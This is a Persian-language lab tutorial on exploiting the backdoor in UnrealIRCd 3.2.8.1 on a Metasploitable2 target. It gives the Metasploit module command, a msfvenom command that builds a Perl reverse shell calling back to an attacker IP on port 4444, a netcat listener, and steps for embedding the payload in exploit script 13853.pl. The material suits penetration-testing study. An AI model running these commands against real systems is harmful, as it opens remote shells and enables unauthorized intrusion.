انتشار محتوای سایت ایران سایبر فقط با ذکر منبع رسمی مجاز است
UnrealIRCd یک IRC daemon منبع باز است و در اصل مبتنی بر DreamForge است که برای سیستم عامل های مشابه یونیکس و ویندوز در دسترس می باشد. از زمان شروع توسعه آن که در حدود UnrealIRCd در مه 1999 بوده، بسیاری از ویژگی های جدید از جمله ویژگی های امنیتی پیشرفته و رفع اشکال به آن اضافه یا اصلاح شده است ، و همین امر موجب شده که به یک سرور محبوب تبدیل شود.
بهره برداری از UnreaIIRCd 3.2.8.1 با استفاده از METASPLOIT
چارچوب Metasploit را با نوشتن فرمان “msfconsole” در ترمینال خود آغاز کنید.
برای بهره برداری از سرویس Daemon IRC از اکسپلویت زیر استفاده کنید:
Command: use exploit/unix/irc/unreal_ircd_3281_backdoor
در گام بعدی با وارد کردن فرمان “show options” می توانید همه گزینه های موجود را مشاهده کنید:

اکنون هدف را با کمک “<set RHOST <your-target-ip” مانند تصویر زیر تنظیم کنید:

اکنون در اینجا می توانید مشاهده کنید که 1 جلسه کامند شل باز شده است و می توانید تمام دستورات مربوط به یونیکس را در برابر دستگاه هدف اجرا کنید.

بهره برداری با استفاده از اسکریپت پرل Perl Script
همین کار را می توان با کمک perl script انجام داد اما قبل از آن باید مطمئن شوید که ابزار wget در دستگاه هدف نصب باشد وگرنه این بهره برداری کار نخواهد کرد.
از دستور زیر استفاده کنید تا با استفاده از msfvenom که یکی از محبوبترین تولیدکننده پیلود است، بتوانید اسکریپت زبان perl را تولید کنید :
Command: msfvenom -p cmd/unix/reverse_perl LHOST=192.168.169.130 LPORT=4444 -f raw
آی پی 192.168.169.130 به دستگاه مورد استفاده (Kali Linux) تعلق دارد و cmd / unix / reverse_perl از نوع payload است.

در اینجا می توانید مشاهده کنید که یک خروجی به زبان پرل تولید شده است و همان پیلود را نیز تست می کند ، کد perl را در ترمینال جدید اجرا کنید و با استفاده از ابزار netcat همانطور که در زیر آمده است ، پورت 4444 را در حالت listen قرار دهید:
Command: nc -lvp 4444

در اینجا می بینید که یک اتصال معکوس در ترمینال netcat باز شده است و می توانید تمام دستورات مربوط به یونیکس را اجرا کنید.
اکنون بیایید بیشتر به کار خود ادامه دهیم و اکسپلویت اصلی (13853.pl) را ویرایش کنیم. برای این کار می توان به راحتی با استفاده از فرمان “locate 13853.pl” جستجو کرده و از آن در فهرست root/ استفاده کنید.

در مرحله بعد ، فایل 13853.pl را با استفاده از یک ویرایشگر باز کنید و کد زیر را با کد پیلود خود که با msfvenom تولید کردیم ، تغییر دهید.
توجه: حتما از علائم نقل قول تکی حاوی شل کد معکوس Perl با یک backslash استفاده کنید. همچنین می توانید پیلودهای دیگر (payload2 $ ، $ payload3 ، $ payload4 ، $ payload5) را حذف کنید تا از اشتباهات با پیامدهای ناخواسته جلوگیری کنید.

اکنون که بهره برداری ما ,ویرایش شده و می دانیم چه چیزی قرار است اجرا شود، زمان آن رسیده تا با تایپ دستور زیر ، اکسپلویت خود را در دستگاه Metasploiable2 شروع کنیم:
Command: perl 13853.pl <target-ip> <port> <payload number>

1